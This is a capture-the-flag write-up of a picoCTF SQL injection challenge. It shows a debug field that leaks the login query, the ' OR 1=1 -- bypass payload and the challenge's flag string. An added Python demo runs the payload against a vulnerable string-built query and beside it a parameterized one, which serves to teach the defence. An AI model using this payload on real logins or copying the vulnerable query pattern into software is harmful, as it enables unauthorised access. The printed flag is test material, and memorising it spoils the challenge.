Tags: sqli
Rating:
The hint here seems to point at an
[SQL injection](https://www.owasp.org/index.php/SQL_Injection), but let's
browse around the app. We have access to three views:
1. The index, that has nothing interesting
2. A "support" page
3. An "admin login page"
The support page contains another clue pointing at an SQL injection:
> Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep
> getting something called a SQL Error
With that in mind, we can look at the login page. Inspecting the source, we see
there's a hidden `debug` field:
```html
<form action="login.php" method="POST">
<fieldset>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" class="form-control">
</div>
<div class="form-group">
<label for="password">Password:</label>
<div class="controls">
<input type="password" id="password" name="password" class="form-control">
</div>
</div>
<input type="hidden" name="debug" value="0">
<div class="form-actions">
<input type="submit" value="Login" class="btn btn-primary">
</div>
</fieldset>
</form>
```
To confirm that, I sent a request with a random username and no password (note:
I used Burp Suite's proxy and repeater to manipulate the requests). With
`debug=0`, we get:
```html
<h1>Login failed.</h1>
```
and with `debug=1`, the response echoes the submitted fields and the SQL query that was built from them:
```html
username: iodbh<h1>Login failed.</h1>
password:
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
```
Great, now we know how the SQL query is constructed: both fields are pasted
straight into the statement between single quotes. We can return all rows by
submitting a username of `' OR 1=1 --` and an empty password, which ends up
constructing the following query:
```sql
SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''
```
Since anything after `--` is treated as a comment and ignored, the effective query is:
```sql
SELECT * FROM users WHERE name='' OR 1=1
```
If we try this payload, we get the flag in the response:
`picoCTF{con4n_r3411y_1snt_1r1sh_9cbc118f}`
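As an added example that is not part of the original writeup or the challenge's own `login.php`, the following Python script reproduces the query construction the `debug=1` output revealed, runs the same `' OR 1=1 --` payload against an in-memory SQLite table, and places a parameterized version of the same lookup beside it so the difference is visible on real rows. The table contents, column names and the `login_*` function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data (assumption, not from the challenge): two users in a
# plaintext-password table, matching the shape of the query the debug output showed.
SAMPLE_USERS = [
    ("admin", "s3cret"),
    ("conan", "obrien"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    # Mirrors the statement the debug field leaked: user input is concatenated
    # directly into the SQL string, so a quote in the input rewrites the WHERE clause.
    return f"SELECT * FROM users WHERE name='{username}' AND password='{password}'"


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """String-built query: returns whatever rows the (attacker-shaped) statement matches."""
    return conn.execute(build_query_vulnerable(username, password)).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Parameterized query: the values travel separately from the statement, so the
    # payload is compared literally against the name column and never parsed as SQL.
    return conn.execute(
        "SELECT * FROM users WHERE name=? AND password=?", (username, password)
    ).fetchall()


def demo() -> dict:
    """Run the page's payload through both code paths and report what each returns."""
    conn = make_db()
    payload = "' OR 1=1 --"
    return {
        "query": build_query_vulnerable(payload, ""),
        "vulnerable_rows": len(login_vulnerable(conn, payload, "")),
        "safe_rows": len(login_safe(conn, payload, "")),
        "legit_rows": len(login_safe(conn, "admin", "s3cret")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `query` entry is exactly the statement shown in the writeup; the string-built path returns every row of the table because `OR 1=1` is true for all of them and `--` comments out the password check, while the parameterized path returns nothing for the payload and still authenticates a genuine credential pair. The second leak on the page, echoing the built query when `debug=1`, is what made the statement shape obvious; a production login endpoint should never render its SQL into the response.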